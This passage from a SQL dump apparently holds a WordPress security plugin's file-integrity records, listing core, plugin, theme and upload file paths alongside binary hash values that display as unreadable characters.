','wp-content/plugins/akismet/akismet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`���{@�\n����K','�\\��Rπ���� ��rt��t�.+y*2\r','',0,'?'),(')�6#�_��̟SAF�','wp-content/plugins/wordfence/views/scanner/issue-control-repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�g��s� ���`V�','��j(���ؠ\r 緪���U+���.�d','',0,'?'),(')�:MT�{j��0�','wp-content/plugins/wordpress-seo/src/conditionals/woocommerce-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v�o�_��xz5I{','r�4S�E�`\r������0�@\\#��\rѝܓ�ED','',0,'?'),(')��]���Z$�P%','wp-includes/embed-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U�z�A>z�\'!f*','*xJ���\"�t��\r^K$U�09���Z�иC�ru','',0,'?'),(')警�Q��Q�/Y�9','wp-includes/blocks/page-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.\0x�\rˡ�8���P:�s','��vM���}��\'�^~��vNF���|{�E','',0,'?'),(')�I�\nΆV���q��{','wp-admin/authorize-application.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&���������','�=��ΰQ5a��(j0hnP4%%f4+��#���','',0,'?'),(')�`��f,��u�4��','wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X� D2%l#b/�W','ջ�R�\0���\0�����i�H//���w��\0�','',0,'?'),('*��g�������H','wp-content/plugins/wordpress-seo/images/local_plugin_assistant.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�p��A���l�2.�','ʥ\r���wׂ`�,s���ű��g��W�2*)','',0,'?'),('* a�F���4��u�vU','wp-admin/images/menu-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�ZY<�i�Y��b�','\'��F�єE\0����7�ɡ��#�>sePض','',0,'?'),('*3G����ү�$�I','wp-content/plugins/wp-cerber/cerber-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƄƑ����D�{��crX','��S#j��7Q\rF�p�oN�dpx��R��e�','',0,'?'),('*Tǚ�qG6��R��H�','wp-includes/blocks/site-logo/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�zQ�^P��,�ʾ+','[胴���t}���t���Q��`�4�m�R','',0,'?'),('*V.XZ��_C[AԀ�C3','wp-includes/js/dist/keycodes.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��QT�{̬��7zE�','\"=-�C��>M^�]�(�Z|;Q��������','',0,'?'),('*\\Tҝ)%]�yiD+','wp-includes/Requests/Exception/HTTP/402.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͈ϚW:l���q~','�g��NQ �������/��� �y5������θc','',0,'?'),('*lK��qW�M\0| ��Y','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��a�.�t�]U��v�','n��\0��<VEկ�Rm�K�r72k�kSe�\'��#','',0,'?'),('*��*�W8��5��2~','wp-includes/css/dist/reusable-blocks/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JRK�N�` �1U%�','�+��,q�K�*��~��B��2���\n�ū�','',0,'?'),('*��-3�u��E�[�O#','wp-includes/images/down_arrow-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]����M�����f�','��w\0����qp�q�5���T�#�\\����','',0,'?'),('*������b��*ee�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x\\8z�M�~�.��','�vR�\0�S~[�\r��Ү6��o���:Ś�\r]','',0,'?'),('*��L�m&&2��\nb','wp-includes/js/tinymce/utils/form_utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�U��T����Li','vL���us<*r�WҪ����.\0|�Rg����','',0,'?'),('*�`U�z�]\"L%�1��','wp-includes/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/Dzx��ǂ��','���,�����E���{��0/m�a�X�i���','',0,'?'),('*�mB��vH\ne��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_font-sizes.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�����MiGx��V�s','i��Y4t��4|-�>1�]�f�)J����I�Z��l','',0,'?'),('*�&C:[���r�9�N�','wp-includes/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��ef���i�\'�jW','6���UmЖ�%��?�M�S�A^=�X��|U��','',0,'?'),('*�\Z07ѥ1O���َ8','wp-includes/js/json2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��{N�|EO�0�','q3�..�j G\\R�nݼI/T��-�','',0,'?'),('*� �ą����\\�','wp-content/plugins/wordfence/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�u�\nL������E','L8M��0�=�Y�kb���|59�b+�z:4','',0,'?'),('+�(-V&S_2X7f�','wp-includes/blocks/paragraph/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�*�V��*)�}�4','ٯt]f����(ވ�9�)��ʷ�I]J#','',0,'?'),('+�gv�����','wp-content/plugins/wordfence/css/wf-onboarding.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�Kwt�G��\'�(�','��mǸ�${���&W�>�.{?�Wo�)�=�H�','',0,'?'),('+&|1�� �w6�b��*','wp-content/plugins/wp-cerber/assets/flags/vu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�@�C.�J���#','��;����\0ě�k��=���G���W$��۳','',0,'?'),('+9���[BU�E�e','wp-admin/js/updates.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Fy2���T�(','1��^��ZH��ʬ���}-G�D;U��W�|','',0,'?'),('+AK\0�X\"��$�n5�','wp-content/plugins/wordpress-seo/packages/js/images/Yoast_icon_kader.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���B���ѕ�w� C','�\\���痎<\r遷���%_�8��[ެF�W�','',0,'?'),('+E.�X��{.�@g�@�','wp-content/plugins/redirection/locale/redirection-en_ZA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y�>���6�)�Z1','C�g��k����Dx\'�\\�Y_�=��˚�H/�','',0,'?'),('+N�H��l}¸�t��+','wp-content/plugins/redirection/locale/redirection-de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y �D��ɋk�-�\'�','RP_1��4A��>V=�i�_v��� ۈ����','',0,'?'),('+O�T�û^R�A�l','wp-content/plugins/wordpress-seo/admin/ryte/class-ryte-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ׁU\"}��\rv��0H','����>wp*5�.y@@�y�{�8zI/��','',0,'?'),('+U.�u���)T)M�','wp-content/plugins/wordpress-seo/js/dist/externals/components-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@Q�N�Pd��S','����5H����ϣ�oF�(x�7i�U��','',0,'?'),('+b\n��Df�X2���Y�C','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d���S:�-N�!Q�0\"','�6�)?��^\"F�*�g|��&��R�Π��\0 ','',0,'?'),('+lH�m�ӿn�Q���','wp-content/plugins/wp-cerber/assets/flags/ae.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*� �X4^���','ظ�,&9uO�)S�ղ�?(2��ᖘ��Lq9�,�','',0,'?'),('+��G*#���f�','wp-admin/network/site-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;�Z�����x���d','�&9�+��\\\0��� ҄&1ܪCj��ڠ�Z','',0,'?'),('+�\ZD���Ze}��','wp-content/plugins/wordfence/views/onboarding/plugin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','谼��v���ν��','�p�g@0\rt@#PM�%�Y�6�9�\Z��M�P^','',0,'?'),('+��t�%R?������','wp-admin/network/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�+���KVe�=�','WN��h�K2Z�F��W���\r08���J5','',0,'?'),('+�b����I=qY��','wp-includes/blocks/freeform/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�[%0���G���','�\r.ZE��h����(:�0B���$u�F','',0,'?'),('+̷�Y���p��$$�,_','wp-content/plugins/redirection/redirection-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e`���vǩ���!','C0�j�z��L�;�1�Q���Y���b%ט8�1','',0,'?'),('+�v!s�/� x��*^','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','؆�c�T��GǮua�K','��#������\ntaf��lU,�o�d��R�(*��','',0,'?'),('+��w��dmD���X�=','wp-content/plugins/redirection/locale/json/redirection-es_VE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qZ_�-걑���','P³����c+��y���<йV����x�','',0,'?'),('+ަkUX���E����h','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-meta-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�5a^�/C|g|�x���','��gi��:�\"�(L���{�Gi]rTմ1q��','',0,'?'),('+�-�re�=XZr�yg','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-login-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|T��}<o��d���','��K��-��9-���k�#�Ƙ��&PwY�','',0,'?'),(',��Je����;�','wp-content/plugins/wp-cerber/assets/flags/sv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�Z�k�}Ϸ ��>','?Ύ�~-y�Ph#sbP���\Z��=��1�tՈY','',0,'?'),(',�\Z�J\'�AWh��','wp-content/plugins/wordfence/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'`������a��� ��','�����y���DFR#\\\\F/��G%RY��x!�B6a','',0,'?'),(',<�� �?C]�0A�','wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ͷ���U裦�h�','��ehӧ�&έ��A�3�+WTh��\n\Z)�?��','',0,'?'),(',Ip��U�w�b��A@#','wp-includes/blocks/spacer/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� @-ŏ��K$_ӯp�','�D�\Z�e�(�kr�����l0�u�[Iya/�/�H','',0,'?'),(',]\'N�%ݑUeT���)','wp-includes/js/dist/annotations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��n��h��g�\"�|U','{��ͳ�P��-E��+��m��I�y�\ZV����','',0,'?'),(',a�(�f��>��k��','wp-content/plugins/wp-cerber/assets/flags/dj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�2�cV�>�!�>�','��A|�L���0��ܷ��H��̠���Y���','',0,'?'),(',dNe�8�����\"�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Cookie/CookieJar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�v�7��%�M�u�','ּ��_q��G�FKG��-�k��(�y�','',0,'?'),(',z�e��Y#uJ~[P\r','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' OpR{�ҵ��Gݍ�','�Y��:B���P5M��s_�����.ن�֎�','',0,'?'),(',��K��%���_��7','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �*9-H�f҅ �X','�ۼ=�w��{���v�^Ƚ���C�qF:@�','',0,'?'),(',���@��hj�qrޒ�','wp-includes/ID3/module.tag.id3v2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�d�4��y�N�4','aƙ�4>$�z���%�5��z ����9��_','',0,'?'),(',�hɃs?4B[�^՝','wp-includes/SimplePie/Cache/DB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w���M�\rʍ�|D�','g#�����]\"�h0Vq�)�0��j�%���I�','',0,'?'),(',��ʄ}�z��U��','wp-content/plugins/wordpress-seo/src/presenters/webmaster/google-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�\'#����µ�u_','2��d�e;��piM<�ı�9~���7�&V]m�','',0,'?'),(',�x\Zpp������L��','wp-content/plugins/wp-cerber/assets/flags/at.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v$<��dkmy\\g�','g߇���;o*���^�U㋥GjJ��>�ED\\�%','',0,'?'),(',���J���f3��:','wp-content/themes/vega/sample/images/featured-image-5.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5���f��Xk�Ѯ','���ظ�/�/�s�k����U��;��z#�_Q','',0,'?'),(',�M�&���K�f~��hK','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�g2�.qExJ�H&','�RhZ^�g�<��F���~�F�H�Y��C07','',0,'?'),(',�d�/�\rT��4q�','wp-content/languages/plugins/wordpress-seo-en_GB-7ca042816066c43b90ff5fb098387db0.json',0,'!i<�TT�`���\nf','!i<�TT�`���\nf','�$�B�e#&��+�{e�6�\09c)0�����h�','',0,'?'),(',��^�N\'-z����','wp-content/uploads/2019/08/rent-350x220.jpg',0,'M|��\0����Wa��','M|��\0����Wa��','�cw��*��0��$é%�]h���8��G��W','',0,'?'),(',��\"��I��e/���','wp-content/plugins/wordpress-seo/images/seo_fitness_assistants_unfit.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b��/$�g���3��-','*9ӭV���y� z��h��?�D�\\O\"���;','',0,'?'),(',�pO��)�ڴOg��\'','wp-content/uploads/2019/09/planning-permission-garden.jpg',0,'KPr��#�Bu����U�c','KPr��#�Bu����U�c','�Օn�w�q�R2�3�����8׳�s��B','',0,'?'),(',愵�X�ա�y%�!�o','wp-content/plugins/wp-cerber/assets/flags/iq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(��C!���>�hF','�����=zZ!��i��74\'�j\"DC���͎(','',0,'?'),(',��(X\'����%Z��|','wp-includes/blocks/group/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����|��VƳ\\��\'','\Z�Y���ӗ�З����t�M����Y뗷�|T','',0,'?'),('-��aT�ޱXJϓ��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M@-~��V���rq<','B�U��\n^E��������FE�י�慎q�d','',0,'?'),('-!,���Q�s��rH','wp-content/uploads/2019/08/Case-study-300x200.jpg',0,'�-3�|�\Z����m�\Z','�-3�|�\Z����m�\Z','��-��{���L�U5�l�OB�Cio��� Wо','',0,'?'),('-\r�7�<9m{�1Sq','wp-content/plugins/redirection/models/redirect/redirect-sanitizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�!���2KD<�U�','�XVy��M�\nْy���I oLk�YC�.u','',0,'?'),('->���\"x �I��','wp-content/themes/twentytwentyone/assets/js/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~K�a��OV��E��','��wr^V[������H\"��|�iAu�h,�','',0,'?'),('-�T��a�P�?�0et','wp-content/plugins/wordpress-seo/admin/class-admin-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���_����FX���','��,�X��*�C�맍\'M�7E�?��U��?a*��','',0,'?'),('-+�ppRv�M�#^0-�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8h�q}��Rr�B','\Z�ww�rd��C�e�Mʵ�AY��y94,O�','',0,'?'),('--�ü��$�);��J5','wp-includes/js/dist/rich-text.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������� \\�','��Ka�Ȑ��2TQ�Ls�\0�ڠѸ&=:@\'','',0,'?'),('-\\��[�����J�ץ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�1��� �M����]�','��A8��{�!��V�t<S��qH�oh�4��y`By�','',0,'?'),('-jާ� �����~hyb','wp-content/plugins/wordfence/lib/menu_support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɚ__#����~<R3�','����t]s\r4��0�6T퍪w܁gB��~B','',0,'?'),('-kdϯ���X�w\\7���','wp-includes/admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�ہ���jV���J\"','q`�����]�;\\�݈1�uł�䫔�[','',0,'?'),('-w�T��r�Y��90�y`','wp-content/plugins/wp-cerber/cerber-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xf�ڒ�k�Di��','�� f����7�6��\"������`)���','',0,'?'),('-����Ǹ�%w=��','wp-admin/css/colors/ocean/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������V�*,^b*$�','nh�ᷘvU�?D��4��w�Zq������w_','',0,'?'),('-��w�3�(\"O5kds�','wp-content/plugins/redirection/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','--�\"7��2�ZZ','+�z2&��?Ev1R\n�yʊ��\Z��','',0,'?'),('-���_���mq+��1�','wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h㠲���i�e��ɡ','IH�Mp\\��N�h\nN��F=-���Z�=hO','',0,'?'),('-��)7�5y�8c��Wv�','wp-admin/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)���/#�j�����S',',O�u�f\'dCT�뭮?��l��?C�V��%','',0,'?'),('-�_��+��Yn��S','wp-includes/js/jquery/ui/tooltip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�\r��c5V����h','+*5�~oѼ�>�\\Z������c���l�','',0,'?'),('-�f��4]�#\"u��l','wp-admin/css/colors/light/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�20���d#�k�$f�D�','�w��4Uދ�K`V��i��ɸ l����̡7','',0,'?'),('-���{�\nwQ���^g','wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]иm�Dt\'f�','����Z�ho�R]C���Z�\Z�OlZϏ�:l��','',0,'?'),('-��藂��Y{]ns�','wp-includes/css/wp-pointer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�U�Y�D�K�z�c','>�;��]ۼH�Ֆ&�ݟ�������`;�','',0,'?'),('-��5�t�U�1Y�v ','wp-content/plugins/wordpress-seo/src/values/images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,��\r�w&\"�ylu','�{ ��@\0��ѻn�\r���m}HF�T�!','',0,'?'),('-��;�W��&�ܽ�`T','wp-content/plugins/wordpress-seo/src/exceptions/indexable/source-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�K@C��T����Y4','�u�gt=mg�*ӣ�̉�\0�@��_㾅�*�R\n','',0,'?'),('-�d�L�ƥXH�m�','wp-content/themes/twentytwentyone/assets/js/editor-dark-mode-support.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ap!}��7�Wsj�','j�����=Xi_����ְނpߤ��^Ѯ��','',0,'?'),('-�?^j�t*��8yd�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-fr_BE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a%�LRKFl�����','���2��+G��S�[��v2��당�!�','',0,'?'),('-�ha+`NST����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/spacer/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>:�wv��:4p��Y ','Ϲ�%虬Yu{].���ג�d�.��@��','',0,'?'),('.@�b���ۑ�q��','wp-content/plugins/wordpress-seo/src/conditionals/headless-rest-endpoints-enabled-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RpHP@��Hz�R�c','#R��q��C\\#w��}� �j��dњ(^d�','',0,'?'),('.Lۡgށ��^�L','wp-content/plugins/wordpress-seo/admin/pages/metas.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�ĥ?�攺rV8V{�','$xπ3���\0I�:f�K:��\'�\'����','',0,'?'),('. M�;�࣍_�\\��T','wp-content/plugins/wordpress-seo/src/presenters/twitter/description-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w���{�\Z��\n�n','N�L�%�*E��V�&�}��r���:�6K','',0,'?'),('. �\r���B���\n���','wp-content/plugins/wordpress-seo/admin/config-ui/components/class-component-mailchimp-signup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u����xr��f','fZ��\0���1ԕH~E�:;�H�G��$U�c`X��','',0,'?'),('. �\0_oE�]A�_�0PJ','wp-includes/js/tinymce/plugins/wpautoresize/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�.�Aj_�m�r#i�','\'��C��b\"B��\\�N�N���*r&.X��J','',0,'?'),('.IhU���3��+B\Z��','wp-includes/images/admin-bar-sprite-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q����8��o��','*E��Ts���al�^�p��X���Z\0��','',0,'?'),('.Y�����s�fv��','wp-content/uploads/2019/10/plumbing4-768x512.jpg',0,'�>�Z��S�)XE0����','�>�Z��S�)XE0����','�_�F��\ZK�{&qfwDQ�8�d�h3Hu5�hpM','',0,'?'),('.ar$����m�V����','wp-content/plugins/wordpress-seo/css/dist/elementor-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@��N|8�$��ET_�a','���)x���œ���&�?��6�&��T$�h;�','',0,'?'),('.x��Ϯ�7����_�','wp-includes/js/mediaelement/mediaelement-and-player.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"���\n�-ۤ�Y','$9~�=:����Z�F�m}�A�5ks� V#� �*','',0,'?'),('.���@k��N?ZQ5','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ParameterBag/FrozenParameterBag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��<��e�Ҡ','V�Q�%���ļ� ���\ru�Tf!BM����Nvq','',0,'?'),('.�麉D0�u�L-c�','wp-content/plugins/wordfence/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���B�W#��#���','�^�<��4��e,��\0��l�����\r�!d','',0,'?'),('.�=��$��.�6��(','wp-includes/blocks/button/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�Q�h�]�nF�M>�','��1=��a4���\\��z�m�h~�e�;)\n?>','',0,'?'),('.�E�[J��l�x��','wp-content/plugins/wordfence/images/forward_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M_��Z?�N)�Ҋ�:�5','���/�<>O&�ȕJR݇e�}�(��m','',0,'?'),('.��7�f�w9Pm@����','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�H�#�IHD���','�v�o�VYx�?���\n��\n&3c-\r�8�m��','',0,'?'),('.�� r��\Z�Q���','wp-content/plugins/wp-cerber/assets/flags/gm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S\'�A)����zU$',']�Z��!�p������1�{f��^EQ3sH','',0,'?'),('.�|G�xܣ�yId��','wp-content/plugins/wordpress-seo/src/builders/indexable-system-page-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�t��UpV�','\ZD���y-P`F�2��.,��>S�Ⱦ��#D�','',0,'?'),('.��Ϡ�a?馺W�8ӵ','wp-includes/rest-api/endpoints/class-wp-rest-pattern-directory-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U<j��)�뷙�d\Z{','�|F����I�p���N+){S)�Ot���~O�','',0,'?'),('.����Q�B4��բag','wp-content/plugins/wordpress-seo/src/helpers/redirect-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L �U�|�� |(J<','��ŧ�mB+1�@ո\'����n��/:$��','',0,'?'),('/������� �`�','wp-content/uploads/2019/08/business-training-300x177.jpg',0,' A@W>�I�V+b�iĺ',' A@W>�I�V+b�iĺ','�)�T��9Y��R�C����b��~��+�','',0,'?'),('/�d�|BbZ����','wp-content/plugins/wordpress-seo/languages/yoast-components-en_GB.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�PB�B�RY��\"s+','U���hx��\0H~\r�UP?>���E&��o�s','',0,'?'),('/\'l�ȞC�aݟ@��9�','wp-content/plugins/wordpress-seo/src/integrations/front-end/schema-accessibility-feature.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b<ⶰk��`�n-���','���^�&��ֻ��#z\00����=jWџ�6�E','',0,'?'),('/*:����o>�t����','wp-includes/js/dist/autop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�H����#ƨpB�]','���7\Z�őp:���HB[�3���ߔ?-�5(','',0,'?'),('/++�%̀�4y@cUI�','wp-content/plugins/redirection/models/file-io.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�H�f\n��F��','�i��>�+9\"��[ycu��6��dzm-�b0B','',0,'?'),('/7k�� ��P�_�^=','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-ru_RU.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�҉_H\Z�)L��^(','1%�Jd�u�Ξ��/F\Z�*XR�(�B��u��b','',0,'?'),('/<ا^ɼf}�\"��$�','wp-includes/images/media/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�4�8�Αy�6�d�','��ø`�������f I$ _Z�X�\"0\r��,','',0,'?'),('/?譚��fe<ckV�','wp-content/plugins/disable-gutenberg/inc/settings-register.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����y<��#9�,','�C̺\"D����ҏ�{EI�Op^�\\�','',0,'?'),('/@���~�Ip�� ��','wp-content/plugins/redirection/redirection-version.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�r Z�C���U��`\"','�l99��Dɠ�24�^K�O=g$`hN�G\'Z�','',0,'?'),('/q;���]�o�q�]k','wp-content/uploads/2019/08/The-best-way-to-choose-an-electrician-768x512.jpg',0,'�^wqT����k�E)','�^wqT����k�E)','Rп���V�����.M�W�2�e��W��','',0,'?'),('/wW[\r��fG��^�Rs�','wp-content/plugins/wordpress-seo/js/dist/indexation-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)\\_���,~�y%','ޥ!�EW,Q���\\�?���|�d\"\Z�R�','',0,'?'),('/�n�Na�L�nU��','wp-content/themes/vega/parts/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I����{�+�qcEyl5','�f��X1����K�0\r@d�֦�/�<��','',0,'?'),('/����\r���K^���','wp-content/plugins/redirection/matches/from-url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\")Y��VV���Oa|[�','�p�\0l0��L/ݫ�ؽ#����e\0��D:P�','',0,'?'),('/��}㦿L�;?�w\\','wp-includes/Requests/Exception/HTTP/401.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��o��X�N���R�','YV$���/���@=������V-��dc�','',0,'?'),('/��M�n�����(�sv','wp-content/themes/twentynineteen/sass/navigation/_menu-main-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/No�\'�n�v��9�,�','�J�P\"Aұ\r�S�P4In\Z*�0A\'�ϫ��p�/]','',0,'?'),('/�s��C4�������','wp-admin/network/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 